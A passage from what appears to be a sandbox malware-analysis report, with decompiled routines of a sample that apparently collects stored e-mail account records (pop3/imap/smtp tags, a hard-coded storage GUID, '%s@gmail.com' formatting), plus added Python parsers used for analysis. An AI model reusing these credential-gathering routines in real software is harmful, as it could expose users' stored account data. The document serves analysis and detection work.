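    return len(a & b) / len(a | b) if (a | b) else 1.0


if __name__ == "__main__":
    apis = parse_api_lines(REPORT_APIS)
    print("API ID:   ", api_id(apis))
    print("String ID:", string_id(REPORT_STRINGS))
```

`token_similarity` is the practical use: paste the APIs block of a function from another report into `parse_api_lines` and compare it with this one, so a re-compiled build whose registry-reading helper lost or gained a call still scores close to 1.0 even though its exact API ID differs.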

C-Code - Quality: 41%
			E00408065(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
				// Recursive menu walker: for every item of the menu _a8 it fetches the caption,
				// strips the accelerator text, passes (ID, caption) to E0040802D and then
				// descends into the item's sub-menu. The decompiler has overlaid the
				// MENUITEMINFOA structure and the 0x1000-byte caption buffer on the argument
				// slots: _a4 = cbSize, _a8 (once assigned 0x36 below) = fMask, _a12 = fType,
				// _a20 = wID, _a24 = hSubMenu, _a40 = dwTypeData, _a44 = cch, _a52 = first
				// byte of the caption buffer.
				int _v0;
				int _t26;
				char* _t32;
				int _t44;
				signed int _t46;
				signed int _t47;

				_t38 = __ecx;
				_t47 = _t46 & 0xfffffff8;
				E00412360(0x1040, __ecx);            // frame set-up for 0x1040 bytes of locals (structure + 4 KiB caption buffer)
				_t26 = GetMenuItemCount(_a8);        // number of items in the menu
				_t44 = 0;                            // item index
				_v0 = _t26;
				if(_t26 <= 0) {
					L13:
					return _t26;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a53, 0, 0x1000);           // clear the caption buffer
					_t47 = _t47 + 0xc;
					_a40 =  &_a52;                       // dwTypeData: receive the caption here
					_a4.cbSize = 0x30;                   // sizeof(MENUITEMINFOA) on 32-bit
					_a8 = 0x36;                          // fMask = MIIM_ID | MIIM_SUBMENU | MIIM_TYPE | MIIM_DATA
					_a44 = 0x1000;                       // cch: size of the caption buffer
					_a20 = 0;                            // wID
					_a52 = 0;
					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4);   // fByPosition = 1: item _t44 by index
					if(_t26 == 0) {
						goto L12;
					}
					if(_a52 == 0) {
						// empty caption (separator or bitmap item): nothing to record, but still recurse
						L10:
						_t55 = _a24;
						if(_a24 != 0) {                  // hSubMenu set: walk the sub-menu with the same routine
							_push(0);
							_push(_a24);
							_push(_a4.cbSize);
							_t26 = E00408065(_t38, _t55);
							_t47 = _t47 + 0xc;
						}
						goto L12;
					}
					_t32 = strchr( &_a52, 9);            // cut at the TAB that separates caption from accelerator text ("Copy\tCtrl+C")
					if(_t32 != 0) {
						 *_t32 = 0;
					}
					_t33 = _a20;                         // default ID: the item's command ID (wID)
					if(_a24 != 0) {                      // sub-menu headers carry no command ID, so synthesise one
						if(_a12 == 0) {                  // fType == MFT_STRING: global counter at 0x4181b4, offset by 0x11558
							 *0x4181b4 =  *0x4181b4 + 1;
							_t33 =  *0x4181b4 + 0x11558;
							__eflags =  *0x4181b4 + 0x11558;
						} else {                         // otherwise: item index, offset by 0x11171
							_t18 = _t44 + 0x11171; // 0x11171
							_t33 = _t18;
						}
					}
					_t26 = E0040802D(_t33,  &_a52);      // record (ID, caption)
					_pop(_t38);
					goto L10;
					L12:
					_t44 = _t44 + 1;                     // next item
				} while (_t44 < _v0);
				goto L13;
			}

Instruction addresses for the listing above, in line order: 0x00408065, 0x00408068, 0x00408070, 0x0040807a, 0x00408082, 0x00408086, 0x0040808a, 0x0040814f, 0x00408154, 0x00000000, 0x00000000, 0x00000000, 0x00408090, 0x00408090, 0x0040809b, 0x004080a0, 0x004080a7, 0x004080b6, 0x004080be, 0x004080c6, 0x004080ce, 0x004080d2, 0x004080d6, 0x004080de, 0x00000000, 0x00000000, 0x004080e4, 0x0040812e, 0x0040812e, 0x00408132, 0x00408134, 0x00408135, 0x00408139, 0x0040813c, 0x00408141, 0x00408141, 0x00000000, 0x00408132, 0x004080ed, 0x004080f6, 0x004080f8, 0x004080f8, 0x004080fe, 0x00408102, 0x00408107, 0x00408111, 0x0040811c, 0x0040811c, 0x00408109, 0x00408109, 0x00408109, 0x00408109, 0x00408107
                                                                                                                                                                  0x00408127
                                                                                                                                                                  0x0040812d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408144
                                                                                                                                                                  0x00408144
                                                                                                                                                                  0x00408145
                                                                                                                                                                  0x00000000

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ItemMenu$CountInfomemsetstrchr
• String ID: 0$6
• API String ID: 2300387033-3849865405
• Opcode ID: 7ff34ab211d6860bdd45bd88976f81f6822f66e3605e9fe9da3e2852f2fef4ac
• Instruction ID: 51172b8e10bed5c2f97a320ed5cd446e6bfcd9d4694fda0f565c00a2b2434e31
• Opcode Fuzzy Hash: 7ff34ab211d6860bdd45bd88976f81f6822f66e3605e9fe9da3e2852f2fef4ac
• Instruction Fuzzy Hash: 7821D171108384AFC710CF65C981A9BB7E8FF88348F04453EF6C4AA280DB79D955CB5A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 66%
			E004044E4(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t44;
				intOrPtr _t50;
				void* _t56;
				intOrPtr _t58;
				void* _t63;

				_t63 = __fp0;
				_t50 = __ecx;
				_v8 = __ecx;
				E00402197( &_v940);                          /* initialise the local result block */
				_t58 = _a4;                                  /* _a4: pointer to the account record being converted */
				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
				_push(_t58 + 0x404);
				_t44 = 0x7f;                                 /* copy cap: at most 0x7f bytes per string slot */
				/* E004060DA is a bounded copy (strlen + memcpy, see APIs below). Five 0x100-byte string
				   slots of the record (offsets 0x404, 0x204, 0x004, 0x104, 0x304) are copied into
				   0x80-byte stack buffers. */
				E004060DA(_t44,  &_v796);
				E004060DA(_t44,  &_v408, _t58 + 0x204);
				E004060DA(_t44,  &_v928, _t58 + 4);
				E004060DA(_t44,  &_v668, _t58 + 0x104);
				_t37 = E004060DA(_t44,  &_v280, _t58 + 0x304);
				_t56 = _t58 + 0x504;                         /* sixth slot: the protocol name */
				/* L00412072 is _stricmp (see APIs below): the protocol slot is compared case-insensitively
				   against "pop3", "imap" and "smtp"; _t37 is the decompiler's name for the eax result
				   (0 on match). The matching tag 1 / 2 / 4 is stored in _v412; no match leaves it untouched. */
				_push("pop3");
				_push(_t56);
				L00412072();
				if(_t37 != 0) {
					_push("imap");
					_push(_t56);
					L00412072();
					if(_t37 != 0) {
						_push("smtp");
						_push(_t56);
						L00412072();
						if(_t37 == 0) {
							_v412 = 4;                       /* smtp */
						}
					} else {
						_v412 = 2;                           /* imap */
					}
				} else {
					_v412 = 1;                               /* pop3 */
				}
				_v24 =  *((intOrPtr*)(_t58 + 0x804));        /* two dwords that follow the six string slots */
				_v20 =  *((intOrPtr*)(_t58 + 0x808));
				return E004023C6( &_v940, _t63, _v8 + 0xfffffe38);   /* _v8 + 0xfffffe38 == this - 0x1c8 */
			}

Address column: 0x004044e4 to 0x004045ef

APIs
  • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
  • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
• _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 00404575
• _stricmp.MSVCRT(?,imap), ref: 00404593
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: _stricmp$memcpystrlen
• String ID: imap$pop3$smtp
• API String ID: 445763297-821077329
• Opcode ID: d315b1c60be8e06bf8a74a29e861cd8fd0a859a3471b1e5e64c4e0a482ae2628
• Instruction ID: 5d3aebf2a9f6afee3de7fcc7c39c9e230d3229a718a14b09e3d1f3abdf4e177e
• Opcode Fuzzy Hash: d315b1c60be8e06bf8a74a29e861cd8fd0a859a3471b1e5e64c4e0a482ae2628
• Instruction Fuzzy Hash: 842151B3500318AFD711DB61CD42BDAB7F8AF54304F10056BE649B3181DB787B858B95
Uniqueness

Uniqueness Score: -1.00%

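The routine E004044E4 above reads six fixed-width string slots from the record passed in _a4 (each copied with a 0x7f-byte cap), tags the protocol slot as 1, 2 or 4 after case-insensitive compares against pop3, imap and smtp, and picks up two dwords at 0x804 and 0x808. The Python below reconstructs that record layout so the same records can be parsed out of a memory dump and the truncation and case handling checked. It is an added example, not code from the sample or from this report. The slot names, the 0 tag for an unmatched protocol and the sample field values are assumptions: the decompiled code gives offsets and lengths, not what each slot holds.

```python
"""Reconstruction of the account-record layout consumed by E004044E4.

Added example; not code from the sample or from the sandbox report.  Slot
meanings are assumptions: the decompiled function only shows offsets, the
0x7f copy cap and the protocol compare, not what each string slot contains.
"""
import struct
from dataclasses import dataclass

SLOT_SIZE = 0x100            # string slots start every 0x100 bytes (0x004, 0x104, ..., 0x504)
COPY_MAX = 0x7F              # E004060DA is called with 0x7f: strlen + memcpy, capped at 127 bytes
SLOT_OFFSETS = (0x004, 0x104, 0x204, 0x304, 0x404)   # the five slots copied into stack buffers
PROTO_OFFSET = 0x504         # slot compared with _stricmp against "pop3", "imap", "smtp"
DWORD_OFFSETS = (0x804, 0x808)                        # two 32-bit values read into _v24 / _v20
RECORD_SIZE = 0x80C

# Tags written to _v412 in E004044E4.  Returning 0 for "no match" is an assumption:
# the original simply leaves _v412 at whatever E00402197 initialised it to.
PROTOCOL_TAGS = {"pop3": 1, "imap": 2, "smtp": 4}


@dataclass
class AccountRecord:
    slots: tuple             # the five capped strings, in record-offset order
    protocol: str            # protocol slot text exactly as stored
    protocol_tag: int        # 1 / 2 / 4 as in E004044E4, 0 if nothing matched
    dwords: tuple            # the values at 0x804 and 0x808


def bounded_cstring(buf: bytes, offset: int, cap: int = COPY_MAX) -> str:
    """Mirror E004060DA: strlen from `offset`, then memcpy at most `cap` bytes."""
    slot = buf[offset:offset + SLOT_SIZE]
    raw = slot.split(b"\x00", 1)[0]          # strlen stops at the first NUL
    return raw[:cap].decode("latin-1")       # memcpy copies no more than 0x7f bytes


def classify_protocol(name: str) -> int:
    """The _stricmp chain: pop3 -> 1, imap -> 2, smtp -> 4, compared case-insensitively."""
    return PROTOCOL_TAGS.get(name.lower(), 0)


def parse_record(buf: bytes) -> AccountRecord:
    """Parse one record laid out as E004044E4 expects it."""
    if len(buf) < RECORD_SIZE:
        raise ValueError(f"record needs {RECORD_SIZE:#x} bytes, got {len(buf):#x}")
    slots = tuple(bounded_cstring(buf, off) for off in SLOT_OFFSETS)
    proto = bounded_cstring(buf, PROTO_OFFSET)
    dwords = tuple(struct.unpack_from("<I", buf, off)[0] for off in DWORD_OFFSETS)
    return AccountRecord(slots, proto, classify_protocol(proto), dwords)


def build_record(slots, protocol: str, dword1: int, dword2: int) -> bytes:
    """Constructed test input with the same layout; used here only to exercise the parser."""
    buf = bytearray(RECORD_SIZE)
    for off, text in zip(SLOT_OFFSETS, slots):
        data = text.encode("latin-1")[:SLOT_SIZE - 1]   # keep room for the NUL terminator
        buf[off:off + len(data)] = data
    pdata = protocol.encode("latin-1")[:SLOT_SIZE - 1]
    buf[PROTO_OFFSET:PROTO_OFFSET + len(pdata)] = pdata
    struct.pack_into("<II", buf, DWORD_OFFSETS[0], dword1, dword2)
    return bytes(buf)


def demo() -> AccountRecord:
    """Constructed sample: a 200-character slot shows the 0x7f truncation and an
    upper-case protocol name shows that the compare is case-insensitive.  The
    values are made up for the demonstration, not taken from the sample."""
    rec = build_record(
        ("mail.example.test", "user@example.test", "A" * 200, "", "Display Name"),
        "IMAP", 993, 1)
    return parse_record(rec)


if __name__ == "__main__":
    parsed = demo()
    print(parsed.protocol, parsed.protocol_tag, len(parsed.slots[2]), parsed.dwords)
```

Run stand-alone it builds one constructed record and parses it: the 200-character slot comes back 127 characters long because of the 0x7f cap, and the upper-case IMAP still maps to tag 2 because the compare is _stricmp. A record carved from the dump would be fed to parse_record directly; the protocol slot at 0x504 is usually the quickest way to recognise the 0x80c-byte records in memory.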
C-Code - Quality: 100%
			E004036A6(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				char _v5;
				char _v132;
				char _v404;
				char _v532;
				intOrPtr _v536;
				char _v920;
				intOrPtr _v924;
				char _v1052;
				char _v1064;
				void* __ebx;
				void* _t18;
				char* _t20;
				char* _t39;
				char* _t41;
				void* _t48;
				void* _t59;

				_t59 = __fp0;
				_t48 = __edi;
				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
					return _t18;                         /* nothing to do; _t18 is just the decompiler's name for eax here */
				}
				_t39 =  &_v132;
				_t20 = E0040EF77(_t39, __edi + 0x87c, _a4); /* fills the 0x80-byte buffer _v132 from the object field at +0x87c */
				if(_t20 != 0) {
					_v5 = 0;
					_t20 = strchr(_t39, 0x3a);           /* 0x3a is ':': split the buffer at the first colon */
					_t41 = _t20;
					if(_t41 != 0) {
                                                                                                                                                                  						 *_t41 = 0;
                                                                                                                                                                  						E00402197( &_v1064);
                                                                                                                                                                  						strcpy( &_v404,  &(_t41[1]));
                                                                                                                                                                  						strcpy( &_v532,  &_v132);
                                                                                                                                                                  						_v924 = 7;
                                                                                                                                                                  						_v536 = 3;
                                                                                                                                                                  						if(strlen( &_v532) + 0xa < 0x7f) {
                                                                                                                                                                  							sprintf( &_v920, "%s@gmail.com",  &_v532);
                                                                                                                                                                  						}
                                                                                                                                                                  						strcpy( &_v1052,  &_v532);
                                                                                                                                                                  						_t20 = E004023C6( &_v1064, _t59, _t48);
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t20;
                                                                                                                                                                  			}
Instruction addresses (in order): 0x004036a6 0x004036a6 0x004036b6 0x00403788 0x00403788 0x004036c7 0x004036ca 0x004036d1 0x004036dc 0x004036e0 0x004036e5 0x004036eb 0x004036f8 0x004036fb 0x00403709 0x00403719 0x00403725 0x0040372f 0x00403748 0x0040375d 0x00403762 0x00403773 0x00403781 0x00403781 0x004036eb 0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040EF77: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040EF8E
                                                                                                                                                                    • Part of subcall function 0040EF77: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040EF9B
                                                                                                                                                                    • Part of subcall function 0040EF77: memcpy.MSVCRT ref: 0040EFD7
                                                                                                                                                                    • Part of subcall function 0040EF77: CoTaskMemFree.OLE32(?,?), ref: 0040EFE6
                                                                                                                                                                  • strchr.MSVCRT ref: 004036E0
                                                                                                                                                                  • strcpy.MSVCRT(?,00000001,?,?,?), ref: 00403709
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403719
                                                                                                                                                                  • strlen.MSVCRT ref: 00403739
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040375D
                                                                                                                                                                  • strcpy.MSVCRT(?,?), ref: 00403773
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                  • String ID: %s@gmail.com
                                                                                                                                                                  • API String ID: 2649369358-4097000612
                                                                                                                                                                  • Opcode ID: 80ed345e0ff0ee47aaf383b724b244bfbf67af68538c23d64fe4f8ff209c4e8a
                                                                                                                                                                  • Instruction ID: 644cd556ee9d6f83430fbc5f755ed5fad511d56830514e9de795baf2bfcfc341
                                                                                                                                                                  • Opcode Fuzzy Hash: 80ed345e0ff0ee47aaf383b724b244bfbf67af68538c23d64fe4f8ff209c4e8a
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B21DEF280411D5EDB21DB54CD85FDA77ACBB14308F0401AFF609E2181EAB89BC48B69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040687C(char* __ebx, intOrPtr _a4, int _a8) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				void _v1031;
                                                                                                                                                                  				void _v1032;
                                                                                                                                                                  				void* _t26;
                                                                                                                                                                  				char* _t27;
                                                                                                                                                                  				int _t32;
                                                                                                                                                                  				int _t38;
                                                                                                                                                                  				char* _t43;
                                                                                                                                                                  				int _t44;
                                                                                                                                                                  				void* _t45;
                                                                                                                                                                  				void** _t48;
                                                                                                                                                                  				void* _t50;
                                                                                                                                                                  				void* _t51;
                                                                                                                                                                  
                                                                                                                                                                  				_t43 = __ebx;
                                                                                                                                                                  				_t44 = 0;
                                                                                                                                                                  				_v1032 = 0;
                                                                                                                                                                  				memset( &_v1031, 0, 0x3ff);
                                                                                                                                                                  				_t26 = _a8;
                                                                                                                                                                  				_t51 = _t50 + 0xc;
                                                                                                                                                                  				 *__ebx = 0;
                                                                                                                                                                  				if(_t26 > 0) {
                                                                                                                                                                  					_t48 = _a4 + 4;
                                                                                                                                                                  					_v8 = _t26;
                                                                                                                                                                  					do {
                                                                                                                                                                  						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
                                                                                                                                                                  						_t32 = strlen( &_v1032);
                                                                                                                                                                  						_a8 = _t32;
                                                                                                                                                                  						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
                                                                                                                                                                  						_t45 = _t44 + _a8 + 1;
                                                                                                                                                                  						_t38 = strlen( *_t48);
                                                                                                                                                                  						_a8 = _t38;
                                                                                                                                                                  						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
                                                                                                                                                                  						_t51 = _t51 + 0x30;
                                                                                                                                                                  						_t48 =  &(_t48[2]);
                                                                                                                                                                  						_t18 =  &_v8;
                                                                                                                                                                  						 *_t18 = _v8 - 1;
                                                                                                                                                                  						_t44 = _t45 + _a8 + 1;
                                                                                                                                                                  					} while ( *_t18 != 0);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t27 = _t44 + _t43;
                                                                                                                                                                  				 *_t27 = 0;
                                                                                                                                                                  				 *((char*)(_t27 + 1)) = 0;
                                                                                                                                                                  				return _t43;
                                                                                                                                                                  			}
Instruction addresses (in order): 0x0040687c 0x0040688b 0x00406895 0x0040689c 0x004068a1 0x004068a4 0x004068a9 0x004068ac 0x004068b2 0x004068b5 0x004068b8 0x004068c9 0x004068d5 0x004068da 0x004068ea 0x004068f4 0x004068f8 0x004068fd 0x00406908 0x00406910 0x00406913 0x00406916 0x00406916 0x00406919 0x00406919 0x0040691f 0x00406920 0x00406923 0x00406926 0x0040692e

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                  • String ID: %s (%s)
                                                                                                                                                                  • API String ID: 3756086014-1363028141
                                                                                                                                                                  • Opcode ID: 930878db99837ba46a6e987faf5d20af4a34b58a77fcbe6d93f567b97a470ebe
                                                                                                                                                                  • Instruction ID: 724a4194cae70d0bf31fff2aa5a30eca349b7c3c60a55174e1cb3006c7faee74
                                                                                                                                                                  • Opcode Fuzzy Hash: 930878db99837ba46a6e987faf5d20af4a34b58a77fcbe6d93f567b97a470ebe
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F1190B2800159AFDB21DF58CD44BDABBACEF45308F00856AFB48EB102D275EA55CB94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 25%
			E0040EF77(void* __ebx, int _a4, void* _a8) {
				char _v20;
				char _v36;
				char _v52;
				void* _t15;
				void* _t17;
				void* _t28;
				intOrPtr* _t31;
				int _t32;

				_t28 = __ebx;
				_t31 = __imp__UuidFromStringA;
				// Parse two hard-coded GUID strings; the second is the null GUID
				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
				// Fail if either GUID does not parse or the helper E0040EF3B reports an error
				if(_t15 != 0 || _t17 != 0 || E0040EF3B( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
					return 0;
				} else {
					// Copy at most 0x7e bytes of the returned data into the caller's buffer (ebx),
					// NUL-terminate it and release the COM-allocated source
					_t32 = _a4;
					if(_t32 > 0x7e) {
						_t32 = 0x7e;
					}
					memcpy(_t28, _a8, _t32);
					 *((char*)(_t28 + _t32)) = 0;
					__imp__CoTaskMemFree(_a8);
					return 1;
				}
			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040EF8E
                                                                                                                                                                  • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040EF9B
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040EFD7
                                                                                                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 0040EFE6
                                                                                                                                                                  Strings
                                                                                                                                                                  • 00000000-0000-0000-0000-000000000000, xrefs: 0040EF96
                                                                                                                                                                  • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040EF89
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                  • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                  • API String ID: 1640410171-3316789007
                                                                                                                                                                  • Opcode ID: 54a3c10d71348b38328debb2075fb86de4f8d1c0c91b0897777fae0c62ad26f4
                                                                                                                                                                  • Instruction ID: e50974e3e7746184743268e00a497f96c507105008b10ce8b40323224852ed78
                                                                                                                                                                  • Opcode Fuzzy Hash: 54a3c10d71348b38328debb2075fb86de4f8d1c0c91b0897777fae0c62ad26f4
                                                                                                                                                                  • Instruction Fuzzy Hash: A501807691012EBACF11AAA5CD40EEF7BACEF48354F004437FD15E7141E634EA548BA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
			E00409F9C(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {

				// Decompiled fragment: adds ecx to the value pointed to by edi
				 *__edi =  *__edi + __ecx;
			}

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040A175: SendMessageA.USER32 ref: 0040A190
                                                                                                                                                                    • Part of subcall function 0040A175: SendMessageA.USER32 ref: 0040A1AA
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409FC1
                                                                                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409FD0
                                                                                                                                                                  • LoadIconA.USER32 ref: 00409FE7
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409FF8
                                                                                                                                                                  • LoadIconA.USER32 ref: 0040A005
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 0040A010
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040A025
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3673709545-0
                                                                                                                                                                  • Opcode ID: 5df2c262a5b4ee5b15d680e4827c5e350c8ab2ef2ec60dcd30680ed78b5bc19f
                                                                                                                                                                  • Instruction ID: 4e57101e09f8a627107abf71349708af879b5e1eab1c783dad4143a9e5363d44
                                                                                                                                                                  • Opcode Fuzzy Hash: 5df2c262a5b4ee5b15d680e4827c5e350c8ab2ef2ec60dcd30680ed78b5bc19f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3101EC71280704BFFA316B60DE4BFD67AA6EB48B05F004425F359690E1C7F56D51DB18
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
			E00409F9D(void* __eax, void* __ecx, intOrPtr* __edi) {

				// Decompiled fragment (same body as E00409F9C, one byte further in): adds ecx to *edi
				 *__edi =  *__edi + __ecx;
			}

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040A175: SendMessageA.USER32 ref: 0040A190
                                                                                                                                                                    • Part of subcall function 0040A175: SendMessageA.USER32 ref: 0040A1AA
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409FC1
                                                                                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409FD0
                                                                                                                                                                  • LoadIconA.USER32 ref: 00409FE7
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409FF8
                                                                                                                                                                  • LoadIconA.USER32 ref: 0040A005
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 0040A010
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040A025
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3673709545-0
                                                                                                                                                                  • Opcode ID: 93f7bf16144be3831d8fe0abe45ae6939580c4d2b0c37b8b20f1dfc57d53bec6
                                                                                                                                                                  • Instruction ID: 4681c035099bb4a28d1464aa710f9ac1d1cdfab18a2ba86be57a79ad66400e71
                                                                                                                                                                  • Opcode Fuzzy Hash: 93f7bf16144be3831d8fe0abe45ae6939580c4d2b0c37b8b20f1dfc57d53bec6
                                                                                                                                                                  • Instruction Fuzzy Hash: 33018C71280304BFFA226B60EE47FD57BA2AB48B01F008465F348AD0F2CBF129509B08
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 92%
			E00407E74(void* __eflags, struct HWND__* _a4) {
				void _v4103;
				char _v4104;
				void* _t8;
				void* _t17;
				intOrPtr _t21; // local left undeclared by the decompiler

				_t8 = E00412360(0x1004, _t17);
				_t21 =  *0x4181b8;
				// Only act if the ini file name stored at 0x4181b8 is non-empty
				if( *0x4181b8 != 0) {
					_v4104 = 0;
					memset( &_v4103, 0, 0x1000);
					// Build the section name "dialog_<n>" at 0x4182c0, then read its "caption" key
					// (E00407F4F wraps GetPrivateProfileStringA) and use it as the window title
					sprintf(0x4182c0, "dialog_%d",  *0x418300);
					if(E00407F4F(_t17, _t21, "caption",  &_v4104) != 0) {
						SetWindowTextA(_a4,  &_v4104);
					}
					// Apply the same treatment to every child control via E00407E17
					return EnumChildWindows(_a4, E00407E17, 0);
				}
				return _t8;
			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00407E9F
                                                                                                                                                                  • sprintf.MSVCRT ref: 00407EB4
                                                                                                                                                                    • Part of subcall function 00407F4F: memset.MSVCRT ref: 00407F73
                                                                                                                                                                    • Part of subcall function 00407F4F: GetPrivateProfileStringA.KERNEL32(004182C0,0000000A,0041344F,?,00001000,004181B8), ref: 00407F95
                                                                                                                                                                    • Part of subcall function 00407F4F: strcpy.MSVCRT(?,?), ref: 00407FAF
                                                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00407EDB
                                                                                                                                                                  • EnumChildWindows.USER32 ref: 00407EEB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
